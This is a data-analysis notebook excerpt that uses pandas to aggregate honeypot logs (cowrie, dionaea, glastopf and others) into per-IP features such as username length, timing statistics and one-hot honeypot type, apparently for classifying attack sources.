19        cowrie  198.199.89.115
20        cowrie  198.199.89.115
21        cowrie  198.199.89.115
22        cowrie  198.199.89.115
23        cowrie  198.199.89.115
24        cowrie  198.199.89.115
25        cowrie  198.199.89.115
26        cowrie  198.199.89.115
27        cowrie  198.199.89.115
28        cowrie  198.199.89.115
29        cowrie  198.199.89.115
...          ...             ...
1443575   cowrie   185.244.25.85
1443576   cowrie   185.244.25.85
1443577   cowrie   185.244.25.85
1443578   cowrie   185.244.25.85
1443579   cowrie   185.244.25.85
1443580   cowrie   185.244.25.85
1443581   cowrie   185.244.25.85
1443582   cowrie   185.244.25.85
1443583   cowrie   185.244.25.85
1443584   cowrie   185.244.25.85
1443585   cowrie   185.244.25.85
1443586   cowrie   185.244.25.85
1443587   cowrie   185.244.25.85
1443588   cowrie   185.244.25.85
1443589   cowrie   185.244.25.85
1443590   cowrie   185.244.25.85
1443591   cowrie   185.244.25.85
1443592   cowrie   185.244.25.85
1443593   cowrie   185.244.25.85
1443594   cowrie   185.244.25.85
1443595   cowrie   185.244.25.85
1443596   cowrie   185.244.25.85
1443597   cowrie   185.244.25.85
1443598   cowrie   185.244.25.85
1443599   cowrie   185.244.25.85
1443600   cowrie     5.188.87.52
1443601  dionaea    185.56.81.30
1443602  dionaea    2.143.88.137
1443603  dionaea    2.143.88.137
1443604  dionaea   42.112.237.43

[1443527 rows x 2 columns]

In [178]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command
0,1.100.22.156,5.000000,0,0,2,88.940892
1,1.52.2.217,6.000000,15,37,7,88.940892
2,1.55.71.60,5.000000,0,0,15,20.461538
3,100.33.94.246,6.000000,0,0,4,88.940892
4,100.36.75.127,6.000000,0,0,2,88.940892
5,101.236.29.126,2.000000,0,0,2,88.940892
6,101.26.35.254,5.200000,53,53,62,88.940892
7,101.71.37.21,6.000000,0,0,2,88.940892
8,102.165.37.59,23.555556,11,49,48,88.940892
9,103.207.244.92,5.000000,0,0,2,88.940892
10,103.21.148.16,3.000000,45,11,6,88.940892
11,103.23.100.217,4.000000,0,0,2,88.940892
12,103.237.147.69,4.000000,0,0,2,88.940892
13,103.249.205.78,2.000000,0,0,2,88.940892
14,103.42.254.96,6.000000,19,14,7,88.940892
15,103.45.109.95,2.000000,0,0,2,88.940892
16,103.53.166.148,2.000000,0,0,2,88.940892
17,103.69.218.147,5.500000,19,33,4,88.940892
18,103.78.183.41,5.000000,0,0,15,20.461538
19,103.79.90.72,3.000000,0,0,2,88.940892
20,103.80.55.34,5.000000,0,0,2,88.940892
21,103.99.113.89,2.000000,0,0,2,88.940892
22,104.131.93.33,9.000000,0,0,2,88.940892
23,104.168.215.199,4.986842,35,43,137,4.857143
24,104.196.16.112,5.000000,0,0,2,88.940892
25,104.236.246.127,6.000000,0,0,2,88.940892
26,104.236.28.167,2.000000,0,0,2,88.940892
27,104.238.116.19,7.000000,0,0,2,88.940892
28,104.243.44.230,21.251825,3,34,11502,28.663072
29,104.248.135.32,6.040650,16,28,585,8.000000
...,...,...,...,...,...,...
17677,96.11.92.220,6.465478,0,0,2,88.940892
17678,96.125.192.9,6.465478,0,0,1,88.940892
17679,96.233.79.179,6.465478,0,0,2,88.940892
17680,96.244.71.124,6.465478,0,0,1,88.940892
17681,96.245.190.226,6.465478,46,4,4,88.940892
17682,96.245.198.6,6.465478,0,0,2,88.940892
17683,96.30.101.87,6.465478,0,0,2,88.940892
17684,96.30.70.153,6.465478,41,11,4,88.940892
17685,96.30.71.168,6.465478,31,11,5,88.940892
17686,96.30.94.26,6.465478,12,17,3,88.940892
17687,96.30.95.194,6.465478,0,0,2,88.940892
17688,96.69.120.161,6.465478,10,0,10,88.940892
17689,96.70.41.109,6.465478,0,0,1,88.940892
17690,96.71.40.78,6.465478,0,0,1,88.940892
17691,96.75.245.217,6.465478,0,0,2,88.940892
17692,96.76.250.161,6.465478,15,53,23,88.940892
17693,96.9.154.23,6.465478,52,40,4,88.940892
17694,96.92.47.189,6.465478,10,0,10,88.940892
17695,97.78.232.134,6.465478,10,0,45,88.940892
17696,98.102.107.42,6.465478,41,11,4,88.940892
17697,98.113.35.10,6.465478,16,31,8,88.940892
17698,98.143.63.246,6.465478,0,0,1,88.940892
17699,98.143.67.212,6.465478,0,0,1,88.940892
17700,98.153.26.245,6.465478,57,6,5,88.940892
17701,98.172.135.115,6.465478,41,10,4,88.940892
17702,98.198.202.103,6.465478,0,0,1,88.940892
17703,98.217.250.11,6.465478,0,0,1,88.940892
17704,98.6.58.60,6.465478,42,11,4,88.940892
17705,99.188.30.66,6.465478,44,24,3,88.940892
17706,99.98.99.67,6.465478,0,0,1,88.940892

In [190]:
honeypot['app'].value_counts()
honeypot.groupby('src_ip').head()

              app           src_ip
0          cowrie   198.199.89.115
1          cowrie   198.199.89.115
2          cowrie   198.199.89.115
3          cowrie   198.199.89.115
4          cowrie   198.199.89.115
33        dionaea    202.53.15.131
34         cowrie    209.97.184.49
35         cowrie    209.97.184.49
36         cowrie    209.97.184.49
37         cowrie    209.97.184.49
38         cowrie    209.97.184.49
67         cowrie     5.188.86.169
68         cowrie  107.173.145.191
69         cowrie  107.173.145.191
70         cowrie  107.173.145.191
71         cowrie  107.173.145.191
72         cowrie  107.173.145.191
128       dionaea  200.219.177.227
162       dionaea  112.209.224.240
163        cowrie   185.244.25.107
164        cowrie   185.244.25.107
165        cowrie   185.244.25.107
166        cowrie   185.244.25.107
167        cowrie   185.244.25.107
186        cowrie      54.38.79.86
187        cowrie  185.220.221.202
188       dionaea  119.115.248.204
189        cowrie  185.220.221.202
190        cowrie   192.236.176.80
191        cowrie   192.236.176.80
...           ...              ...
1441880   dionaea     103.53.53.86
1441905   dionaea  113.179.102.149
1441908   dionaea  113.179.102.149
1441919   dionaea    36.72.213.121
1441920   dionaea    36.72.213.121
1442004   dionaea   14.177.126.132
1442005   dionaea   14.177.126.132
1442012   dionaea  190.216.247.178
1442014   dionaea  190.216.247.178
1442016  glastopf    36.152.65.205
1442688   dionaea   194.135.108.82
1442689   dionaea   194.135.108.82
1442743   dionaea    103.88.129.21
1442744   dionaea    103.88.129.21
1442748   dionaea    187.7.215.138
1442749   dionaea    187.7.215.138
1443016   dionaea    150.129.30.85
1443087   dionaea    150.129.30.85
1443121   dionaea    114.35.32.168
1443228   dionaea    200.119.200.3
1443234   dionaea   189.69.151.181
1443236   dionaea    200.119.200.3
1443263   dionaea   190.27.239.158
1443264   dionaea   190.27.239.158
1443353   dionaea    27.106.50.142
1443356   dionaea    27.106.50.142
1443388   dionaea    41.234.153.69
1443464   dionaea    41.234.153.69
1443473   dionaea     185.90.60.80
1443543   dionaea     185.90.60.80

[64446 rows x 2 columns]

In [193]:
new_current = pd.merge(current, honeypot, how = 'inner', on = 'src_ip')
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command
0,1.100.22.156,5.000000,0,0,2,88.940892
1,1.52.2.217,6.000000,15,37,7,88.940892
2,1.55.71.60,5.000000,0,0,15,20.461538
3,100.33.94.246,6.000000,0,0,4,88.940892
4,100.36.75.127,6.000000,0,0,2,88.940892
5,101.236.29.126,2.000000,0,0,2,88.940892
6,101.26.35.254,5.200000,53,53,62,88.940892
7,101.71.37.21,6.000000,0,0,2,88.940892
8,102.165.37.59,23.555556,11,49,48,88.940892
9,103.207.244.92,5.000000,0,0,2,88.940892
10,103.21.148.16,3.000000,45,11,6,88.940892
11,103.23.100.217,4.000000,0,0,2,88.940892
12,103.237.147.69,4.000000,0,0,2,88.940892
13,103.249.205.78,2.000000,0,0,2,88.940892
14,103.42.254.96,6.000000,19,14,7,88.940892
15,103.45.109.95,2.000000,0,0,2,88.940892
16,103.53.166.148,2.000000,0,0,2,88.940892
17,103.69.218.147,5.500000,19,33,4,88.940892
18,103.78.183.41,5.000000,0,0,15,20.461538
19,103.79.90.72,3.000000,0,0,2,88.940892
20,103.80.55.34,5.000000,0,0,2,88.940892
21,103.99.113.89,2.000000,0,0,2,88.940892
22,104.131.93.33,9.000000,0,0,2,88.940892
23,104.168.215.199,4.986842,35,43,137,4.857143
24,104.196.16.112,5.000000,0,0,2,88.940892
25,104.236.246.127,6.000000,0,0,2,88.940892
26,104.236.28.167,2.000000,0,0,2,88.940892
27,104.238.116.19,7.000000,0,0,2,88.940892
28,104.243.44.230,21.251825,3,34,11502,28.663072
29,104.248.135.32,6.040650,16,28,585,8.000000
...,...,...,...,...,...,...
17677,96.11.92.220,6.465478,0,0,2,88.940892
17678,96.125.192.9,6.465478,0,0,1,88.940892
17679,96.233.79.179,6.465478,0,0,2,88.940892
17680,96.244.71.124,6.465478,0,0,1,88.940892
17681,96.245.190.226,6.465478,46,4,4,88.940892
17682,96.245.198.6,6.465478,0,0,2,88.940892
17683,96.30.101.87,6.465478,0,0,2,88.940892
17684,96.30.70.153,6.465478,41,11,4,88.940892
17685,96.30.71.168,6.465478,31,11,5,88.940892
17686,96.30.94.26,6.465478,12,17,3,88.940892
17687,96.30.95.194,6.465478,0,0,2,88.940892
17688,96.69.120.161,6.465478,10,0,10,88.940892
17689,96.70.41.109,6.465478,0,0,1,88.940892
17690,96.71.40.78,6.465478,0,0,1,88.940892
17691,96.75.245.217,6.465478,0,0,2,88.940892
17692,96.76.250.161,6.465478,15,53,23,88.940892
17693,96.9.154.23,6.465478,52,40,4,88.940892
17694,96.92.47.189,6.465478,10,0,10,88.940892
17695,97.78.232.134,6.465478,10,0,45,88.940892
17696,98.102.107.42,6.465478,41,11,4,88.940892
17697,98.113.35.10,6.465478,16,31,8,88.940892
17698,98.143.63.246,6.465478,0,0,1,88.940892
17699,98.143.67.212,6.465478,0,0,1,88.940892
17700,98.153.26.245,6.465478,57,6,5,88.940892
17701,98.172.135.115,6.465478,41,10,4,88.940892
17702,98.198.202.103,6.465478,0,0,1,88.940892
17703,98.217.250.11,6.465478,0,0,1,88.940892
17704,98.6.58.60,6.465478,42,11,4,88.940892
17705,99.188.30.66,6.465478,44,24,3,88.940892
17706,99.98.99.67,6.465478,0,0,1,88.940892

In [192]:
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline

In [226]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,amun_x,conpot_x,cowrie_x,dionaea_x,...,glastopf_x,rdphoney_x,amun_y,conpot_y,cowrie_y,dionaea_y,frappe_y,glastopf_y,rdphoney_y,app
0,1.100.22.156,5.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
1,1.52.2.217,6.000000,15,37,7,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
2,1.55.71.60,5.000000,0,0,15,20.461538,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
3,100.33.94.246,6.000000,0,0,4,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
4,100.36.75.127,6.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
5,101.236.29.126,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
6,101.26.35.254,5.200000,53,53,62,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
7,101.26.35.254,5.200000,53,53,62,88.940892,0,0,0,1,...,0,0,0,0,1,0,0,0,0,cowrie
8,101.26.35.254,5.200000,53,53,62,88.940892,0,0,1,0,...,0,0,0,0,0,1,0,0,0,dionaea
9,101.26.35.254,5.200000,53,53,62,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
10,101.71.37.21,6.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
11,102.165.37.59,23.555556,11,49,48,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
12,103.207.244.92,5.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
13,103.21.148.16,3.000000,45,11,6,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
14,103.23.100.217,4.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
15,103.237.147.69,4.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
16,103.249.205.78,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
17,103.42.254.96,6.000000,19,14,7,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
18,103.45.109.95,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
19,103.53.166.148,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
20,103.69.218.147,5.500000,19,33,4,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
21,103.78.183.41,5.000000,0,0,15,20.461538,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
22,103.79.90.72,3.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
23,103.80.55.34,5.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
24,103.99.113.89,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
25,104.131.93.33,9.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
26,104.168.215.199,4.986842,35,43,137,4.857143,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
27,104.196.16.112,5.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
28,104.236.246.127,6.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
29,104.236.28.167,2.000000,0,0,2,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
18384,96.11.92.220,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18385,96.125.192.9,6.465478,0,0,1,88.940892,0,0,0,0,...,1,0,0,0,0,0,0,1,0,glastopf
18386,96.233.79.179,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18387,96.244.71.124,6.465478,0,0,1,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
18388,96.245.190.226,6.465478,46,4,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18389,96.245.198.6,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18390,96.30.101.87,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18391,96.30.70.153,6.465478,41,11,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18392,96.30.71.168,6.465478,31,11,5,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18393,96.30.94.26,6.465478,12,17,3,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18394,96.30.95.194,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18395,96.69.120.161,6.465478,10,0,10,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18396,96.70.41.109,6.465478,0,0,1,88.940892,0,0,1,0,...,0,0,0,0,1,0,0,0,0,cowrie
18397,96.71.40.78,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18398,96.75.245.217,6.465478,0,0,2,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18399,96.76.250.161,6.465478,15,53,23,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18400,96.9.154.23,6.465478,52,40,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18401,96.92.47.189,6.465478,10,0,10,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18402,97.78.232.134,6.465478,10,0,45,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18403,98.102.107.42,6.465478,41,11,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18404,98.113.35.10,6.465478,16,31,8,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18405,98.143.63.246,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18406,98.143.67.212,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18407,98.153.26.245,6.465478,57,6,5,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18408,98.172.135.115,6.465478,41,10,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18409,98.198.202.103,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18410,98.217.250.11,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18411,98.6.58.60,6.465478,42,11,4,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea
18412,99.188.30.66,6.465478,44,24,3,88.940892,0,0,0,0,...,1,0,0,0,0,0,0,1,0,glastopf
18413,99.98.99.67,6.465478,0,0,1,88.940892,0,0,0,1,...,0,0,0,0,0,1,0,0,0,dionaea

In [209]:
dat = data.groupby('src_ip')[['src_ip', 'app']].head()
temp = dat.drop_duplicates()

In [210]:
let = pd.get_dummies(temp['app'])
let.head()

    amun  conpot  cowrie  dionaea  frappe  glastopf  rdphoney
0      0       0       1        0       0         0         0
33     0       0       0        1       0         0         0
34     0       0       1        0       0         0         0
67     0       0       1        0       0         0         0
68     0       0       1        0       0         0         0

In [234]:
det = pd.concat([let,temp], axis = 1)
det['app'].value_counts()
counts = det['app'].value_counts()
det = det[~det['app'].isin(counts[counts < 100].index)]
det['app'].value_counts()

dionaea     15755
cowrie       1405
amun          274
rdphoney      271
glastopf      218
Name: app, dtype: int64

In [227]:
current.columns

Index(['src_ip', 'length_username', 'mean_time_difference',
       'sd_time_difference', 'sensor_number', 'length_command', 'amun_x',
       'conpot_x', 'cowrie_x', 'dionaea_x', 'frappe_x', 'glastopf_x',
       'rdphoney_x', 'amun_y', 'conpot_y', 'cowrie_y', 'dionaea_y', 'frappe_y',
       'glastopf_y', 'rdphoney_y', 'app'],
      dtype='object')

In [228]:
current.drop(['amun_x',
       'conpot_x', 'cowrie_x', 'dionaea_x', 'frappe_x', 'glastopf_x',
       'rdphoney_x', 'amun_y', 'conpot_y', 'cowrie_y', 'dionaea_y', 'frappe_y',
       'glastopf_y', 'rdphoney_y'], axis = 1, inplace = True)

In [235]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,app_x,amun,conpot,cowrie,dionaea,frappe,glastopf,rdphoney,app_y
0,1.100.22.156,5.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
1,1.52.2.217,6.000000,15,37,7,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
2,1.55.71.60,5.000000,0,0,15,20.461538,cowrie,0,0,1,0,0,0,0,cowrie
3,100.33.94.246,6.000000,0,0,4,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
4,100.36.75.127,6.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
5,101.236.29.126,2.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
6,101.26.35.254,5.200000,53,53,62,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
7,101.26.35.254,5.200000,53,53,62,88.940892,dionaea,0,0,1,0,0,0,0,cowrie
8,101.26.35.254,5.200000,53,53,62,88.940892,cowrie,0,0,0,1,0,0,0,dionaea
9,101.26.35.254,5.200000,53,53,62,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
10,101.26.35.254,5.200000,53,53,62,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
11,101.26.35.254,5.200000,53,53,62,88.940892,dionaea,0,0,1,0,0,0,0,cowrie
12,101.26.35.254,5.200000,53,53,62,88.940892,cowrie,0,0,0,1,0,0,0,dionaea
13,101.26.35.254,5.200000,53,53,62,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
14,101.71.37.21,6.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
15,102.165.37.59,23.555556,11,49,48,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
16,103.207.244.92,5.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
17,103.21.148.16,3.000000,45,11,6,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
18,103.23.100.217,4.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
19,103.237.147.69,4.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
20,103.249.205.78,2.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
21,103.42.254.96,6.000000,19,14,7,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
22,103.45.109.95,2.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
23,103.53.166.148,2.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
24,103.69.218.147,5.500000,19,33,4,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
25,103.78.183.41,5.000000,0,0,15,20.461538,cowrie,0,0,1,0,0,0,0,cowrie
26,103.79.90.72,3.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
27,103.80.55.34,5.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
28,103.99.113.89,2.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
29,104.131.93.33,9.000000,0,0,2,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
19500,96.11.92.220,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19501,96.125.192.9,6.465478,0,0,1,88.940892,glastopf,0,0,0,0,0,1,0,glastopf
19502,96.233.79.179,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19503,96.244.71.124,6.465478,0,0,1,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
19504,96.245.190.226,6.465478,46,4,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19505,96.245.198.6,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19506,96.30.101.87,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19507,96.30.70.153,6.465478,41,11,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19508,96.30.71.168,6.465478,31,11,5,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19509,96.30.94.26,6.465478,12,17,3,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19510,96.30.95.194,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19511,96.69.120.161,6.465478,10,0,10,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19512,96.70.41.109,6.465478,0,0,1,88.940892,cowrie,0,0,1,0,0,0,0,cowrie
19513,96.71.40.78,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19514,96.75.245.217,6.465478,0,0,2,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19515,96.76.250.161,6.465478,15,53,23,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19516,96.9.154.23,6.465478,52,40,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19517,96.92.47.189,6.465478,10,0,10,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19518,97.78.232.134,6.465478,10,0,45,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19519,98.102.107.42,6.465478,41,11,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19520,98.113.35.10,6.465478,16,31,8,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19521,98.143.63.246,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19522,98.143.67.212,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19523,98.153.26.245,6.465478,57,6,5,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19524,98.172.135.115,6.465478,41,10,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19525,98.198.202.103,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19526,98.217.250.11,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19527,98.6.58.60,6.465478,42,11,4,88.940892,dionaea,0,0,0,1,0,0,0,dionaea
19528,99.188.30.66,6.465478,44,24,3,88.940892,glastopf,0,0,0,0,0,1,0,glastopf
19529,99.98.99.67,6.465478,0,0,1,88.940892,dionaea,0,0,0,1,0,0,0,dionaea

In [238]:
current.drop(['frappe'], axis = 1, inplace = True)

In [244]:
current.drop_duplicates('src_ip', inplace = True)

In [253]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,amun,conpot,cowrie,dionaea,glastopf,rdphoney
0,1.100.22.156,5.000000,0,0,2,88.940892,0,0,1,0,0,0
1,1.52.2.217,6.000000,15,37,7,88.940892,0,0,1,0,0,0
2,1.55.71.60,5.000000,0,0,15,20.461538,0,0,1,0,0,0
3,100.33.94.246,6.000000,0,0,4,88.940892,0,0,1,0,0,0
4,100.36.75.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0
5,101.236.29.126,2.000000,0,0,2,88.940892,0,0,1,0,0,0
6,101.26.35.254,5.200000,53,53,62,88.940892,0,0,0,1,0,0
14,101.71.37.21,6.000000,0,0,2,88.940892,0,0,1,0,0,0
15,102.165.37.59,23.555556,11,49,48,88.940892,0,0,1,0,0,0
16,103.207.244.92,5.000000,0,0,2,88.940892,0,0,1,0,0,0
17,103.21.148.16,3.000000,45,11,6,88.940892,0,0,1,0,0,0
18,103.23.100.217,4.000000,0,0,2,88.940892,0,0,1,0,0,0
19,103.237.147.69,4.000000,0,0,2,88.940892,0,0,1,0,0,0
20,103.249.205.78,2.000000,0,0,2,88.940892,0,0,1,0,0,0
21,103.42.254.96,6.000000,19,14,7,88.940892,0,0,1,0,0,0
22,103.45.109.95,2.000000,0,0,2,88.940892,0,0,1,0,0,0
23,103.53.166.148,2.000000,0,0,2,88.940892,0,0,1,0,0,0
24,103.69.218.147,5.500000,19,33,4,88.940892,0,0,1,0,0,0
25,103.78.183.41,5.000000,0,0,15,20.461538,0,0,1,0,0,0
26,103.79.90.72,3.000000,0,0,2,88.940892,0,0,1,0,0,0
27,103.80.55.34,5.000000,0,0,2,88.940892,0,0,1,0,0,0
28,103.99.113.89,2.000000,0,0,2,88.940892,0,0,1,0,0,0
29,104.131.93.33,9.000000,0,0,2,88.940892,0,0,1,0,0,0
30,104.168.215.199,4.986842,35,43,137,4.857143,0,0,1,0,0,0
31,104.196.16.112,5.000000,0,0,2,88.940892,0,0,1,0,0,0
32,104.236.246.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0
33,104.236.28.167,2.000000,0,0,2,88.940892,0,0,1,0,0,0
34,104.238.116.19,7.000000,0,0,2,88.940892,0,0,1,0,0,0
35,104.243.44.230,21.251825,3,34,11502,28.663072,0,0,1,0,0,0
36,104.248.135.32,6.040650,16,28,585,8.000000,0,0,1,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...
19500,96.11.92.220,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19501,96.125.192.9,6.465478,0,0,1,88.940892,0,0,0,0,1,0
19502,96.233.79.179,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19503,96.244.71.124,6.465478,0,0,1,88.940892,0,0,1,0,0,0
19504,96.245.190.226,6.465478,46,4,4,88.940892,0,0,0,1,0,0
19505,96.245.198.6,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19506,96.30.101.87,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19507,96.30.70.153,6.465478,41,11,4,88.940892,0,0,0,1,0,0
19508,96.30.71.168,6.465478,31,11,5,88.940892,0,0,0,1,0,0
19509,96.30.94.26,6.465478,12,17,3,88.940892,0,0,0,1,0,0
19510,96.30.95.194,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19511,96.69.120.161,6.465478,10,0,10,88.940892,0,0,0,1,0,0
19512,96.70.41.109,6.465478,0,0,1,88.940892,0,0,1,0,0,0
19513,96.71.40.78,6.465478,0,0,1,88.940892,0,0,0,1,0,0
19514,96.75.245.217,6.465478,0,0,2,88.940892,0,0,0,1,0,0
19515,96.76.250.161,6.465478,15,53,23,88.940892,0,0,0,1,0,0
19516,96.9.154.23,6.465478,52,40,4,88.940892,0,0,0,1,0,0
19517,96.92.47.189,6.465478,10,0,10,88.940892,0,0,0,1,0,0
19518,97.78.232.134,6.465478,10,0,45,88.940892,0,0,0,1,0,0
19519,98.102.107.42,6.465478,41,11,4,88.940892,0,0,0,1,0,0
19520,98.113.35.10,6.465478,16,31,8,88.940892,0,0,0,1,0,0
19521,98.143.63.246,6.465478,0,0,1,88.940892,0,0,0,1,0,0
19522,98.143.67.212,6.465478,0,0,1,88.940892,0,0,0,1,0,0
19523,98.153.26.245,6.465478,57,6,5,88.940892,0,0,0,1,0,0
19524,98.172.135.115,6.465478,41,10,4,88.940892,0,0,0,1,0,0
19525,98.198.202.103,6.465478,0,0,1,88.940892,0,0,0,1,0,0
